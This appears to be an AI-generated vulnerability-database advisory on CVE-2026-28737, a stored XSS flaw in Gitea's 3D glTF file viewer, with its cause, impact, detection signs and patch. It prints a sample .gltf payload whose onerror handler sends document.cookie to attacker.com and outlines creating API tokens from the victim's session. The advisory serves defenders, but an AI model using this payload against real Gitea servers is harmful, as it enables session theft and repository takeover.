
PEACH
Un cadre d’isolation des locataires
CVE-2026-28737 is a stored cross-site scripting (XSS) vulnerability in Gitea's built-in 3D file viewer, introduced via the Online3DViewer integration. An authenticated attacker with write access to any repository can push a crafted .gltf file containing a malicious extensionsRequired value; when any user views the file, arbitrary JavaScript executes in their browser session. The vulnerability affects Gitea versions 1.25.0 through 1.25.x (the 3D file preview feature was introduced in 1.25) and is patched in 1.26.0. It carries a CVSS v3.1 base score of 8.7 (High) (GitHub Advisory, Gitea Advisory).
The root cause is improper neutralization of user-controlled input before DOM insertion (CWE-79). When Online3DViewer parses a glTF file, it checks whether all entries in extensionsRequired are supported; for unsupported extensions, it constructs an error message embedding the raw extension name and passes it to SetError(). Gitea's rendering code then inserts this error message directly into the DOM via element.innerHTML = errorMessage without any HTML escaping or sanitization, allowing an attacker to inject arbitrary HTML and JavaScript through the extension name field. The upstream online-3d-viewer npm package (v0.16.0, bundled with Gitea 1.25) is identified as the root cause, as extension names from the JSON file are taken verbatim with no escaping (GitHub Advisory, Gitea Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the malicious .gltf file, operating under the Gitea origin with the victim's authenticated session (including cookies and CSRF tokens). From this XSS context, an attacker can create API access tokens, read private repositories via same-origin API calls, modify repository contents (enabling supply chain attacks), and escalate privileges if the victim is a Gitea administrator. The payload persists in the repository and fires on every subsequent page view, maximizing the attack surface without requiring any additional interaction beyond the victim navigating to the file page (GitHub Advisory, Gitea Advisory).
.gltf file with a JavaScript payload embedded in the extensionsRequired field, for example:{
"asset": {"version": "2.0"},
"buffers": [],
"extensionsRequired": ["<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>"],
"scenes": []
}.gltf file to the repository via git push or the Gitea web UI file upload.innerHTML./user/settings/applications with the page's CSRF token to create a persistent API token, read private repositories, or modify repository contents (GitHub Advisory, Gitea Advisory)..gltf file in Gitea; unusual API calls to /user/settings/applications or /api/v1/user/tokens originating from a browser session shortly after file viewing..gltf file pages followed by rapid API token creation or settings modification requests from the same session; web server logs showing POST /user/settings/applications requests with valid CSRF tokens from unexpected user agents..gltf files in repositories containing HTML tags or JavaScript within the extensionsRequired JSON field (e.g., <script>, <img onerror=, javascript: strings)./user/settings/applications) that the user did not create; unauthorized changes to repository contents, SSH keys, or email addresses on accounts that recently viewed .gltf files (GitHub Advisory).Upgrade to Gitea v1.26.0, which includes the fix (PR #37233) that sanitizes error messages before DOM insertion, replacing innerHTML with textContent for error display. If immediate patching is not possible, restrict repository write access to trusted users only to prevent malicious .gltf files from being pushed. As an additional workaround, administrators can disable the 3D file viewer feature if it is not required. Additional hardening recommended in the advisory includes rendering 3D file previews inside a sandboxed <iframe> with a restrictive Content-Security-Policy (GitHub Advisory, Gitea Advisory).
The Gitea 1.26.0 release blog post acknowledged the security fixes included in the release, and Linuxiac covered the release highlighting the security improvements (Gitea Blog, Linuxiac). The vulnerability was reported by security researcher yonatan-pl and published by Gitea maintainer lunny on June 14, 2026. No significant broader media coverage or notable social media discussion has been identified beyond the advisory publication.
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."